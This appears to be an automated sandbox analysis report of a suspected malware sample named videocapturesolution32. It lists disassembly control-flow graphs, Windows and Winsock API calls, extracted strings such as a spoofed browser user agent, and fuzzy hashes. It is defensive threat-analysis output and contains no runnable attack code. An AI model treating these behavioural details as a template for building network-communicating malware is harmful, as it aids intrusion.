                                                          control_flow_graph 402 401f64-401f84 FindResourceA 403 401f86-401f9d GetLastError SizeofResource 402->403 404 401f9f-401fa1 402->404 403->404 405 401fa6-401fec LoadResource LockResource GlobalAlloc call 402d60 * 2 403->405 406 402096-40209a 404->406 411 401fee-401ff9 405->411 411->411 412 401ffb-402003 GetTickCount 411->412 413 402032-402038 412->413 414 402005-402007 412->414 415 402053-402083 GlobalAlloc call 401c26 413->415 417 40203a-40204a 413->417 414->415 416 402009-40200f 414->416 424 402088-402093 415->424 416->415 418 402011-402023 416->418 419 40204c 417->419 420 40204e-402051 417->420 422 402025 418->422 423 402027-40202a 418->423 419->420 420->415 420->417 422->423 423->418 425 40202c-40202e 423->425 424->406 425->416 426 402030 425->426 426->415
                                                          APIs
                                                          • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                          • GetLastError.KERNEL32 ref: 00401F86
                                                          • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                          • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                          • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                          • GetTickCount.KERNEL32 ref: 00401FFB
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                          • String ID:
                                                          • API String ID: 564119183-0
                                                          • Opcode ID: 4b406982c55cd146a53e35bcfe0d224a47769fdd51ac53a5645699cce47c5184
                                                          • Instruction ID: b01298f5e92dfabffd3260d40ec81ee59ee3d80feb476c4020a7475af27d6630
                                                          • Opcode Fuzzy Hash: 4b406982c55cd146a53e35bcfe0d224a47769fdd51ac53a5645699cce47c5184
                                                          • Instruction Fuzzy Hash: 60315C32900255EFDB105FB89F8896F7B68EF45344B10807AFA86F7281DA748941C7A8

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 427 2db7b86-2db7b8c 428 2db7b8e-2db7ba7 427->428 429 2db7b1c-2db7b2d 427->429 430 2db7ba9-2db7bb7 428->430 431 2db7c04-2db7c09 428->431 432 2db7b33-2db7b46 call 2db439c 429->432 433 2db7b2e call 2dc4af0 429->433 435 2db7bcc-2db7bf6 430->435 434 2db7c0b-2db7c11 431->434 431->435 438 2db7b48-2db7b4a call 2db534d 432->438 439 2db7b4f-2db7b56 call 2dc2f74 432->439 433->432 438->439 444 2db66f8-2db66fd 439->444 445 2db66ff-2db6701 439->445 446 2db6708 Sleep 444->446 447 2db670e-2db6742 RtlEnterCriticalSection RtlLeaveCriticalSection 445->447 448 2db6703 445->448 446->447 449 2db6792 447->449 450 2db6744-2db6750 447->450 448->446 451 2db6796 449->451 450->449 452 2db6752-2db675f 450->452 453 2db6761-2db6765 452->453 454 2db6767-2db6768 452->454 455 2db676c-2db6790 call 2dc4af0 * 2 453->455 454->455 455->451
                                                          APIs
                                                          • Sleep.KERNEL32(0000EA60), ref: 02DB6708
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB6713
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB6724
                                                          • _free.LIBCMT ref: 02DB7B50
                                                          Strings
                                                          • urls, xrefs: 02DB7B36
                                                          • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02DB6739
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeaveSleep_free
                                                          • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$urls
                                                          • API String ID: 2653569029-4235545730
                                                          • Opcode ID: c7894c2cb32892f1a1c1d27bc912b414b8cc3409b6e8d60848e7a1d5e6266743
                                                          • Instruction ID: c5614bfc66d971c0e0b8605633dac572c1f31189251f1b9028c5988182af0e1c
                                                          • Opcode Fuzzy Hash: c7894c2cb32892f1a1c1d27bc912b414b8cc3409b6e8d60848e7a1d5e6266743
                                                          • Instruction Fuzzy Hash: E4315A3290C380EBE7129F34A8647DA7BB1EF86714F18099DE5C29B386D760DC01C796

                                                          Control-flow Graph

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02DB2706
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02DB272B
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DD5B53), ref: 02DB2738
                                                            • Part of subcall function 02DB1712: __EH_prolog.LIBCMT ref: 02DB1717
                                                          • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02DB2778
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02DB27D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                          • String ID: timer
                                                          • API String ID: 4293676635-1792073242
                                                          • Opcode ID: 513643a6af52e0df086c455dbc714f96a7869d0c25203b3e5d07d118a4b523fa
                                                          • Instruction ID: 51e0638d2dc27f5bee998e980aae19e57eb8c6e1346a10d288748e17bba246e7
                                                          • Opcode Fuzzy Hash: 513643a6af52e0df086c455dbc714f96a7869d0c25203b3e5d07d118a4b523fa
                                                          • Instruction Fuzzy Hash: 38319AB2805B01EFD3119F25C948B66BBE8FF48714F104A2EF85682B80D770EC04CBA5

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 511 2db2b95-2db2baf 512 2db2bb1-2db2bb9 call 2dc0b10 511->512 513 2db2bc7-2db2bcb 511->513 520 2db2bbf-2db2bc2 512->520 515 2db2bdf 513->515 516 2db2bcd-2db2bd0 513->516 519 2db2be2-2db2c11 WSASetLastError WSARecv call 2dba508 515->519 516->515 518 2db2bd2-2db2bdd call 2dc0b10 516->518 518->520 525 2db2c16-2db2c1d 519->525 523 2db2d30 520->523 526 2db2d32-2db2d38 523->526 527 2db2c1f-2db2c2a call 2dc0b10 525->527 528 2db2c2c-2db2c32 525->528 539 2db2c3f-2db2c42 527->539 529 2db2c46-2db2c48 528->529 530 2db2c34-2db2c39 call 2dc0b10 528->530 533 2db2c4a-2db2c4d 529->533 534 2db2c4f-2db2c60 call 2dc0b10 529->534 530->539 537 2db2c66-2db2c69 533->537 534->526 534->537 541 2db2c6b-2db2c6d 537->541 542 2db2c73-2db2c76 537->542 539->529 541->542 543 2db2d22-2db2d2d call 2db1996 541->543 542->523 544 2db2c7c-2db2c9a call 2dc0b10 call 2db166f 542->544 543->523 551 2db2cbc-2db2cfa WSASetLastError select call 2dba508 544->551 552 2db2c9c-2db2cba call 2dc0b10 call 2db166f 544->552 558 2db2d08 551->558 559 2db2cfc-2db2d06 call 2dc0b10 551->559 552->523 552->551 562 2db2d0a-2db2d12 call 2dc0b10 558->562 563 2db2d15-2db2d17 558->563 564 2db2d19-2db2d1d 559->564 562->563 563->523 563->564 564->519
                                                          APIs
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB2BE4
                                                          • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02DB2C07
                                                            • Part of subcall function 02DBA508: WSAGetLastError.WS2_32(00000000,?,?,02DB2A51), ref: 02DBA516
                                                          • WSASetLastError.WS2_32 ref: 02DB2CD3
                                                          • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02DB2CE7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$Recvselect
                                                          • String ID: 3'
                                                          • API String ID: 886190287-280543908
                                                          • Opcode ID: 38bd1cab14971f8a72d30f62f8b8d4c64c1ebf965903b808b4badf64fcd31f04
                                                          • Instruction ID: fb33a37080700687a80e9497619da87b8aeb771d2ccb17cdab8cd184ec613796
                                                          • Opcode Fuzzy Hash: 38bd1cab14971f8a72d30f62f8b8d4c64c1ebf965903b808b4badf64fcd31f04
                                                          • Instruction Fuzzy Hash: 40412CB2515305DED712DF64C4287ABBBEAAF84355F104D1EE89687380EB74DD40CBA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 619 2db29ee-2db2a06 620 2db2a0c-2db2a10 619->620 621 2db2ab3-2db2abb call 2dc0b10 619->621 623 2db2a39-2db2a4c WSASetLastError closesocket call 2dba508 620->623 624 2db2a12-2db2a15 620->624 628 2db2abe-2db2ac6 621->628 629 2db2a51-2db2a55 623->629 624->623 627 2db2a17-2db2a36 call 2dc0b10 call 2db2f50 624->627 627->623 629->621 631 2db2a57-2db2a5f call 2dc0b10 629->631 637 2db2a69-2db2a71 call 2dc0b10 631->637 638 2db2a61-2db2a67 631->638 643 2db2aaf-2db2ab1 637->643 644 2db2a73-2db2a79 637->644 638->637 639 2db2a7b-2db2aad ioctlsocket WSASetLastError closesocket call 2dba508 638->639 639->643 643->621 643->628 644->639 644->643
                                                          APIs
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB2A3B
                                                          • closesocket.WS2_32 ref: 02DB2A42
                                                          • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02DB2A89
                                                          • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02DB2A97
                                                          • closesocket.WS2_32 ref: 02DB2A9E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastclosesocket$ioctlsocket
                                                          • String ID:
                                                          • API String ID: 1561005644-0
                                                          • Opcode ID: 93381772a95a2a48178340753296ec29fd4de66f78eb79f7985694dc9b4be899
                                                          • Instruction ID: 48cb9b554c4f79b7cf7ed67298feae6d206166032c07b6886a1fbda104367444
                                                          • Opcode Fuzzy Hash: 93381772a95a2a48178340753296ec29fd4de66f78eb79f7985694dc9b4be899
                                                          • Instruction Fuzzy Hash: 6D21FB72A14205EBEB21AFB8985CBAEB7E9DF45315F14496DE846D3380EB70CD40CB61

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 646 2db1ba7-2db1bcf call 2dd53f0 RtlEnterCriticalSection 649 2db1be9-2db1bf7 RtlLeaveCriticalSection call 2dbe32f 646->649 650 2db1bd1 646->650 652 2db1bfa-2db1c20 RtlEnterCriticalSection 649->652 651 2db1bd4-2db1be0 call 2db1b79 650->651 658 2db1be2-2db1be7 651->658 659 2db1c55-2db1c6e RtlLeaveCriticalSection 651->659 654 2db1c34-2db1c36 652->654 656 2db1c38-2db1c43 654->656 657 2db1c22-2db1c2f call 2db1b79 654->657 661 2db1c45-2db1c4b 656->661 657->661 664 2db1c31 657->664 658->649 658->651 661->659 663 2db1c4d-2db1c51 661->663 663->659 664->654
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DB1BAC
                                                          • RtlEnterCriticalSection.NTDLL ref: 02DB1BBC
                                                          • RtlLeaveCriticalSection.NTDLL ref: 02DB1BEA
                                                          • RtlEnterCriticalSection.NTDLL ref: 02DB1C13
                                                          • RtlLeaveCriticalSection.NTDLL ref: 02DB1C56
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$H_prolog
                                                          • String ID:
                                                          • API String ID: 1633115879-0
                                                          • Opcode ID: a7b1bdf5e84ff346fd93a91e7a7685033c169150cb6267466b133a5dcb2a9ed8
                                                          • Instruction ID: d32cd90df9e4596e91e635f21a6504b1e832390ff02dd2faeb0884694107892b
                                                          • Opcode Fuzzy Hash: a7b1bdf5e84ff346fd93a91e7a7685033c169150cb6267466b133a5dcb2a9ed8
                                                          • Instruction Fuzzy Hash: CC219775A00614EFDB15CF68C494BAAFBB5FF49711F208589E84A97301DBB0ED05CBA0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 666 402c98-402d46 GetLocalTime 668 40da80-40dc82 call 401f27 666->668 669 40d74f-40d750 666->669 675 40dc88-40dc8b 668->675 676 40216b-4021d4 668->676 669->668 676->669
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: #1;Y$/chk$p:
                                                          • API String ID: 481472006-3938946946
                                                          • Opcode ID: 174aeff93fd1e5a2b807cb43a16ede3dae5b06a99f6ad31c9884a5eeaa346480
                                                          • Instruction ID: 0ee0fe65e5c720b86506fbe8b3ea9a0a26e8e827718234d5478388d0d0c7ae03
                                                          • Opcode Fuzzy Hash: 174aeff93fd1e5a2b807cb43a16ede3dae5b06a99f6ad31c9884a5eeaa346480
                                                          • Instruction Fuzzy Hash: 3E112175E08152DAE708DBB4EF516EA7BB0A642740714013BD983FA0A2C7388D0ACB1D
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CountCreateEventTick
                                                          • String ID: %g
                                                          • API String ID: 785081183-2063349475
                                                          • Opcode ID: bc912a72565cee74f5a9536f5e3c211a70a5e870712f44be298132af04d2245c
                                                          • Instruction ID: df22761d22ea8c2e7b2d79e63149090690c3c770bf321ece70ac716673f71753
                                                          • Opcode Fuzzy Hash: bc912a72565cee74f5a9536f5e3c211a70a5e870712f44be298132af04d2245c
                                                          • Instruction Fuzzy Hash: 17116B76804641DBC3004B70BF66AE17BF4A306314750413AD596B21E3E238884BDA1D
                                                          APIs
                                                          • GetVersion.KERNEL32 ref: 00403336
                                                            • Part of subcall function 00404454: HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                            • Part of subcall function 00404454: HeapDestroy.KERNEL32 ref: 004044A4
                                                          • GetCommandLineA.KERNEL32 ref: 00403384
                                                          • GetStartupInfoA.KERNEL32(?), ref: 004033AF
                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004033D2
                                                            • Part of subcall function 0040342B: ExitProcess.KERNEL32 ref: 00403448
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                          • String ID:
                                                          • API String ID: 2057626494-0
                                                          • Opcode ID: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                          • Instruction ID: a936b3102d24e78b19d7c169988c3063d29dd1dd2c17feae02d4b7387c8d63d1
                                                          • Opcode Fuzzy Hash: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                          • Instruction Fuzzy Hash: 172183B1900615AED704AFB5DE45A6E7F68EF44705F10413EF901B72D2DB385900CB58
                                                          APIs
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB2EEE
                                                          • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02DB2EFD
                                                          • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02DB2F0C
                                                          • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02DB2F36
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$Socketsetsockopt
                                                          • String ID:
                                                          • API String ID: 2093263913-0
                                                          • Opcode ID: d8fa2f38fdea164856b69fc171325053a958da70631db2b38902f794f2f6968c
                                                          • Instruction ID: 19db9fb9dfad3930a59fe98235db3a3889edfea2a6bfde7982624aa6c0fb2516
                                                          • Opcode Fuzzy Hash: d8fa2f38fdea164856b69fc171325053a958da70631db2b38902f794f2f6968c
                                                          • Instruction Fuzzy Hash: 7E012971651204BBDB209F65DC48F9ABFA9EF89761F008599F919DB281D7708D00CB70
                                                          APIs
                                                            • Part of subcall function 02DB2D39: WSASetLastError.WS2_32(00000000), ref: 02DB2D47
                                                            • Part of subcall function 02DB2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02DB2D5C
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB2E6D
                                                          • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02DB2E83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$Sendselect
                                                          • String ID: 3'
                                                          • API String ID: 2958345159-280543908
                                                          • Opcode ID: 70b59a5bd2202392cce9454ece9374663c9eab858c4d07fca87e60be0c80b2cb
                                                          • Instruction ID: ec0f05c922b0450007b76355efb9958b5a477d47df37cdb7059f8bbe368060cb
                                                          • Opcode Fuzzy Hash: 70b59a5bd2202392cce9454ece9374663c9eab858c4d07fca87e60be0c80b2cb
                                                          • Instruction Fuzzy Hash: BE317072A10209DBDB12DF65C8687EE7BA6EF04358F10455ADC0697340E7B59D51CBE0
                                                          APIs
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB2AEA
                                                          • connect.WS2_32(?,?,?), ref: 02DB2AF5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastconnect
                                                          • String ID: 3'
                                                          • API String ID: 374722065-280543908
                                                          • Opcode ID: 1d70b4fd3502d50a035f2da6e5c583e4623597607d6366e506e195d8295b44a5
                                                          • Instruction ID: 4d7c92b13b75332ebad2124021583ad93dc9f34f7b723836bfdb2933890e2b0f
                                                          • Opcode Fuzzy Hash: 1d70b4fd3502d50a035f2da6e5c583e4623597607d6366e506e195d8295b44a5
                                                          • Instruction Fuzzy Hash: C2217471E10104DBDF11EF6484286EDBBAADF44325F1045999C1997384EB748E019BA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: 8b3d51a2960b931702809a692f33d8aff31ed5e7047f7b2cfdee8228d9b7396b
                                                          • Instruction ID: 559e3a221654f72c9b23b93cf808d24914476744a09e62b14f5b6f3ee5b2979d
                                                          • Opcode Fuzzy Hash: 8b3d51a2960b931702809a692f33d8aff31ed5e7047f7b2cfdee8228d9b7396b
                                                          • Instruction Fuzzy Hash: C4513CB1904256DFCB45DF68D4506AABBB1FF08320F10819EE86A9B380D774DD10CFA0
                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(?), ref: 02DB36A7
                                                            • Part of subcall function 02DB2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02DB2432
                                                            • Part of subcall function 02DB2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02DB2445
                                                            • Part of subcall function 02DB2420: RtlEnterCriticalSection.NTDLL(?), ref: 02DB2454
                                                            • Part of subcall function 02DB2420: InterlockedExchange.KERNEL32(?,00000001), ref: 02DB2469
                                                            • Part of subcall function 02DB2420: RtlLeaveCriticalSection.NTDLL(?), ref: 02DB2470
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                          • String ID:
                                                          • API String ID: 1601054111-0
                                                          • Opcode ID: ea842e456aed57da860ace03c2c931055f38fb191dc1272ec709e2ddf4ce0068
                                                          • Instruction ID: 76f7b17218b73482d2fb7d85d05bd2967080e35a6b9674512ebd74eb61864387
                                                          • Opcode Fuzzy Hash: ea842e456aed57da860ace03c2c931055f38fb191dc1272ec709e2ddf4ce0068
                                                          • Instruction Fuzzy Hash: 5A11BFB6100209EBDB229E14CC95FEA3B6AEF00354F10455AFD53CA790CB34DC60EBA4
                                                          APIs
                                                          • __beginthreadex.LIBCMT ref: 02DC2106
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02DBA988,00000000), ref: 02DC2137
                                                          • ResumeThread.KERNEL32(?,?,?,?,?,00000002,02DBA988,00000000), ref: 02DC2145
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleResumeThread__beginthreadex
                                                          • String ID:
                                                          • API String ID: 1685284544-0
                                                          • Opcode ID: 7220b7e24f7b7f7849581c958f884488241a87535beb31bf813afaf8d8de44a3
                                                          • Instruction ID: 0d2a53fb8cf2b943efe29298e579991ff9008c63743d838a29bcb62e7aa7f628
                                                          • Opcode Fuzzy Hash: 7220b7e24f7b7f7849581c958f884488241a87535beb31bf813afaf8d8de44a3
                                                          • Instruction Fuzzy Hash: 59F0C274240202ABE7209E98DC84F95B3E8EF48324F34456EF658C7380C771AC92CA90
                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(02DE72B4), ref: 02DB1ABA
                                                          • WSAStartup.WS2_32(00000002,00000000), ref: 02DB1ACB
                                                          • InterlockedExchange.KERNEL32(02DE72B8,00000000), ref: 02DB1AD7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Interlocked$ExchangeIncrementStartup
                                                          • String ID:
                                                          • API String ID: 1856147945-0
                                                          • Opcode ID: 130ff231315363e50c9daafba7075536306015447617fc53f1b3e05bea4fc21d
                                                          • Instruction ID: 861593b24ed632a913bd0bedb5e10c56c22d6b5641531c860c7ae16a92140a1b
                                                          • Opcode Fuzzy Hash: 130ff231315363e50c9daafba7075536306015447617fc53f1b3e05bea4fc21d
                                                          • Instruction Fuzzy Hash: C5D05E31D85A149FF62076A4AC0EAB8F72CEB06615F904791FC6BC03C0EB506D2485B6
                                                          APIs
                                                          • CloseServiceHandle.ADVAPI32 ref: 0040291D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleService
                                                          • String ID: vX
                                                          • API String ID: 1725840886-1561072969
                                                          • Opcode ID: 60e464b36b80733d6f9527ed0e0f11013c5fed2b9b3840347595f6311235c9ad
                                                          • Instruction ID: 75ed0369c9df28f6acf4931ccb6957978d9ea70bd98a5afa033d49298f14f2a6
                                                          • Opcode Fuzzy Hash: 60e464b36b80733d6f9527ed0e0f11013c5fed2b9b3840347595f6311235c9ad
                                                          • Instruction Fuzzy Hash: 21016B21D0E3C69ADB1657706E665F53FA1E74231071440BBC883766D3C1780C4BD72E
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID: vX
                                                          • API String ID: 1304948518-1561072969
                                                          • Opcode ID: b4e02137d5301ede0af7b1b19f1642fc5c0742621ca4ecec9582720a786a71df
                                                          • Instruction ID: ff4b8d9abfc6869612d76087786a42353ce2e5bc6733d2197eb858a557ce6de4
                                                          • Opcode Fuzzy Hash: b4e02137d5301ede0af7b1b19f1642fc5c0742621ca4ecec9582720a786a71df
                                                          • Instruction Fuzzy Hash: 9FF07876C042998BEB0C5771BDA69F63BECC301325B4040BFE493B62D2D5380D49AB29
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DB4BF2
                                                            • Part of subcall function 02DB1BA7: __EH_prolog.LIBCMT ref: 02DB1BAC
                                                            • Part of subcall function 02DB1BA7: RtlEnterCriticalSection.NTDLL ref: 02DB1BBC
                                                            • Part of subcall function 02DB1BA7: RtlLeaveCriticalSection.NTDLL ref: 02DB1BEA
                                                            • Part of subcall function 02DB1BA7: RtlEnterCriticalSection.NTDLL ref: 02DB1C13
                                                            • Part of subcall function 02DB1BA7: RtlLeaveCriticalSection.NTDLL ref: 02DB1C56
                                                            • Part of subcall function 02DBE0F7: __EH_prolog.LIBCMT ref: 02DBE0FC
                                                            • Part of subcall function 02DBE0F7: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02DBE17B
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 02DB4CF2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                          • String ID:
                                                          • API String ID: 1927618982-0
                                                          • Opcode ID: 1265a098f8a82f990b60845703b6491f8174a6a46348c8b33800763896dca677
                                                          • Instruction ID: a2acd22de0e93c056bb96afdd5ea77f69078ae6aab54c85cf444d51413ee8aae
                                                          • Opcode Fuzzy Hash: 1265a098f8a82f990b60845703b6491f8174a6a46348c8b33800763896dca677
                                                          • Instruction Fuzzy Hash: 61511B75D04248DFDB16DFA8C4A4AEEBBB9EF08314F14815AE806AB352D7309E44CF60
                                                          APIs
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB2D47
